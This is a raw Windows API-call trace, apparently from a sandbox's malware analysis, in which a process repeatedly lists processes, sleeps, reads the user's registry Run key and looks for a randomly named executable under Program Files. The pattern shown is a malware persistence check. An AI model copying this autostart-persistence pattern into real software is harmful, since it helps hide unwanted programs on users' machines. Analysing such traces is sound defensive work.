1 [0175.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.677] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.687] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.688] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.688] NtClose (Handle=0x14c) returned 0x0 [0175.688] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.688] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.688] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.688] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.688] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.688] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.692] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.704] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.704] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.704] NtClose (Handle=0x14c) returned 0x0 [0175.704] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.704] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.704] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.704] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.704] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.704] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.708] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.719] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.719] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.719] NtClose (Handle=0x14c) returned 0x0 [0175.719] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.719] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.719] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.719] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.719] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.719] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.723] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.734] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.735] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.735] NtClose (Handle=0x14c) returned 0x0 [0175.735] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.735] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.735] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.735] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.735] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.735] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.739] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.753] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.753] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.753] NtClose (Handle=0x14c) returned 0x0 [0175.753] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.754] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.754] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.754] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.754] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.754] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.758] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.766] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.766] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.766] NtClose (Handle=0x14c) returned 0x0 [0175.766] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.766] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.766] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.766] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.766] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.767] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.771] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.781] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.782] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.782] NtClose (Handle=0x14c) returned 0x0 [0175.782] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.782] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, 